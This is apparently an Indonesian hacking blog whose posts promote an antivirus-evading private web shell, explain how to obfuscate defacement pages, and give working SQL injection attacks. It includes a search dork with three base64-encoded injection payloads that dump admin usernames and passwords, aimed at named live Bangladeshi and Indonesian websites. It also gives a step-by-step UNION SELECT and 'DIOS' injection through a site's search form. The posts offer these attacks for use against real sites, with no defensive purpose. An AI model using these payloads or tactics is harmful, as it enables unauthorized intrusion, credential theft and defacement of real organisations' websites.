Friday, December 30, 2016

Shell Privat Tidak terdetksi virus

Kali ini saya ingin berbagi shell yang saya gunakan.
shel yang berawal dari  gALerZ xh33L b4cKdDoRz.
dan saya recode untuk shell privat.

kenapa saya tertarik shell ini ?  

  1. ukuranya sangat kecil
  2. Tidak terdektsi sebagai virus di antivirus mana pun
  3. shellnya saya jadikan shell privat.
untuk ukuran shell ini yaitu hanya  sebesar 4kb saja.
dan ini hasil dari Total virus yang telah saya scan :


Tampilan Saat memasukan password :
 
untuk tampilan shell :
 



Badi yang ingin mendownloadnya bisa klik d sini
untul password shell default adalah : orie404

Cara Encoding Script Deface.

Kalian pasti sudah punya script Deface pribadi kan ?
dan kalian pasti pernah mengalami orang yang tanpa izin maen copas script kita dan di ubah nama namanya tanpa mencantumkan nama anda d dalamnya.

Kali ini saya punya solusi untuk memberi sedikit perlindungan pada script kita hanya bermodal kan HackBarMOD saja. :D

Perhatikan langkah - langkah berikut dan simak dengan baik supaya mengerti :D

Yang pertama di lakukan adalah buka kode script kalian dari <html> sampai </html> dan blok semuanya dari sampai seperti ini :
 
Sesudah di blok anda tinggal  mencopasnya saja di HackBarMod sperti ini :
 
Jika sudah di taro di HackBar anda tinggal memblocknya lagi lalu klik URLENC.DEC -->  maka hasilnya akan sperti ini :
 



Setelah itu copas Script dan Ganti tulisan warna biru dengan script yang telah kalian Encoding tadi  :

<Script Language='Javascript'>
<!-- bems404.blogspot.co.id -->
<!--
document.write(unescape('Taro hasil Encoding Script kalian di sini '));
//-->
</Script>

Contohnya seperti gambar berikut :
 

Dan save scriptnya dengan Extensi : HTML .
Kemudaian upload Script kalian seperti biasa :D
CONTOH Scrtipt saya yang telah di Encoding :


Dan saat di view-Sourcenya :
 
Sekian tutorial Tentang Encoding Script deface. semoga bermanfaat :D

    Tuesday, December 27, 2016

    Exploit web Banglades ( BD )

    Kali ini saya ingin berbagi salah satu dork dan exploit untuk website banglades ( bd ).
    Mungkin kalo sudah baca artikel saya tentang SQLI Base64 mungkin tau cara kerja exploit yang saya buat ini.

    oke langsung saja ke intinya :

    Dork     :  inurl : facilities.php?id=MQ== site:bd ( Kembangkan Sendiri supaya dapet banyak perawan )

    Exploit   :
    1. LTEnIFVOSU9OIEFMTCBTRUxFQ1QgMSwyLDMsbWFrZV9zZXQoNixAOj0weDBhLChzZWxlY3QoMSlmcm9tKGNvcmVfdXNlcl9pbmZvKXdoZXJlQDo9bWFrZV9zZXQoNTExLEAsMHgzYzZjNjkzZSxUQkwxMV9VU0VSX05BTUUsVEJMMTFfVVNFUl9QQVNTKSksQCksNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0IC0tIA==
    2. LTEnIFVOSU9OIEFMTCBTRUxFQ1QgMSwyLDMsbWFrZV9zZXQoNixAOj0weDBhLChzZWxlY3QoMSlmcm9tKGNvcmVfdXNlcl9pbmZvKXdoZXJlQDo9bWFrZV9zZXQoNTExLEAsMHgzYzZjNjkzZSxUQkwxMV9VU0VSX05BTUUsVEJMMTFfVVNFUl9QQVNTKSksQCksNSw2LDcsOCw5LDEwLDExIC0tIA==
    3. LTEnIFVOSU9OIEFMTCBTRUxFQ1QgMSwyLDMsbWFrZV9zZXQoNixAOj0weDBhLChzZWxlY3QoMSlmcm9tKGNvcmVfdXNlcl9pbmZvKXdoZXJlQDo9bWFrZV9zZXQoNTExLEAsMHgzYzZjNjkzZSxUQkwxMV9VU0VSX05BTUUsVEJMMTFfVVNFUl9QQVNTKSksQCksNSw2LDcsOCw5IC0tIA== 
    Menu Login admin : /login_slide.php

    Oke di situ terdapat 3 exploit, terus bagaimana cara penggunaanya ?
    simak baik - baik ya langkah demi langkahnya supaya mengerti .

    Hasil dari dork inurl : facilities.php?id=MQ== site:bd
     

    Untuk dork bisa di kembangkan sendiri yah :D

    Jika sudah memasukan dorknya silakan pilih salah satu webnya.
    Di sini saya pilih web http://www.dhakacollege.edu.bd/facilities.php?id=MQ== Sebagai target dan Contohnya.
     


    Jika Sudah memilih webnya anda tinggal masukan exploitnya saja.

    Bagaimana cara masukan exploitnya ?
    yaitu anda tinggal mengganti tulisan
    MQ== dengan exploitnya. Misalnya anda menggunakan exploit nomer 1 gagal anda bisa menggunakan exploit nomer 2 atau 3. Perhatikan gambar berikut :




    Nah lihat hasilnya muncul lah user dan passwordnya, anda tinggal men - cracknya saja.
    Dan masuk kemenu adminya :D


    oke sekian exploit sederhana yang saya buat ini :D


    untuk yang ingin bertana - bertanya seputar artikel yang saya buat bisa chat saya langsung .



    Monday, December 19, 2016

    SQLi memanfaatkan Menu pencarian pada website

    Mungkin hampir semua para injektor sudah mengetahui menemukan injek point memanfaatkan menu pencarian pada suatu web.

    Bagi yang blom tau dan ingin belajar,  di sini saya akan memberikan sdikit tutorial SQLi memanfaatkan menu pencarian pada suatu web.

    Bahan paling utama adalah HackBarMod .

    Di sini saya akan memberikan live target targetnya yaitu :
    http://pbi.co.id/media.php?module=Product

     

    oke d sini saya memanfaatkan menu pencarian barang.
     

    Mari di bagian colum pencarian kita masukan injek point nya, yaitu tanda kutip ( ' ).
    seperti ini :
     
    Jika sudah memasukan injek point nya langsung klik Mulai Pencarian atau tekan enter saja.
    maka hasilnya seperti ini :

    kita bisa lihat menu detail barangnya menghilang saat kita memberikan injek point pada menu pencarian barang.
    Terus bagaimana kita untuk melanjutkan injek nya ?
    oke setelah memberikan injek point mari kita lihat HackBarMod. mari kita Load Url dan ceklis menu Post data seperti ini :


     

    Kita bisa melihat di bagian bawah muncul sebuah menu post data dan dalam menu post data terdapat injek point yang sudah berubah menjadi Hex Encoding yaitu %27.
    nah kita bisa melanjutkan peng injeksian di balakng injek point kita yaitu %27 dengan memberinya comments terlebih dahulu.
    mari kita coba memberi commentsnya  +--+- lalu Execute. maka hasilnya seperti ini.
     
    ternyata memberi comments +--+- tidak mengembalikan detail produk sperti semula. mari kita coba tanda plus ( + ) di ubah menjadi sepasi . maka hasilnya seperti ini :
     
    Kita lihat setlah kita mengubah tanda puls ( + ) menjadi sepasi ternyata work bisa di lihat menu detail produknya kembali seperti semula.
    Langkah selanjutnya kita tinggal melakukan order by di belakang injek point atau %27 .
    seperti ini :
     
    di web ini saya menumkan colum error pada angka 12 seperti ini :
     

    kita bisa lihat di saat kita melakukan order by pada column 12 table detail produk - nya menghilang kembali.
    jadi column yg tidak error ada 11 columns, mari kita melakukan union select sebanyak column yang tidak error yaitu sebanyak 11 columns .
    seperti ini :
     D1=Ukuran&T1=-%27 UNION ALL SELECT+1,2,3,4,5,6,7,8,9,10,11-- -&B1=Mulai+Pencarian

    jika berhasil angka togelnya akan muncul seperti ini :
     

    Angka togelnya yaitu : 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 .

    Nah di bagian Angka yang muncul itu anda bisa melakukan DIOS saya memilih di angka 2 .
    Di sini saya menggunakan DIOS : concat(0x696e6a656b206279206f726965343034,0x3c62723e,0x76657273696f6e,0x3a,version(),0x3c62723e,0x75736572,0x3a,user(),0x3c62723e,0x4461746162617365,0x3a,database(),0x3c62723e,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@))
    maka jadinya seperti ini :
    D1=Ukuran&T1=-%27 UNION ALL SELECT 1,concat(0x696e6a656b206279206f726965343034,0x3c62723e,0x76657273696f6e,0x3a,version(),0x3c62723e,0x75736572,0x3a,user(),0x3c62723e,0x4461746162617365,0x3a,database(),0x3c62723e,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)),3,4,5,6,7,8,9,10,11-- -&B1=Mulai+Pencarian

     Jika melakukanya benar Kita bisa lihat hasilnya seperti ini :
     

    Oke gmna mudah bukan ?

    Salam hangat dari orie404 dan terima kasih sudah datang ke sini, jika ingin bertanya - tanya silakan chat saya saja.
     
    Cool Blue Outer Glow Pointer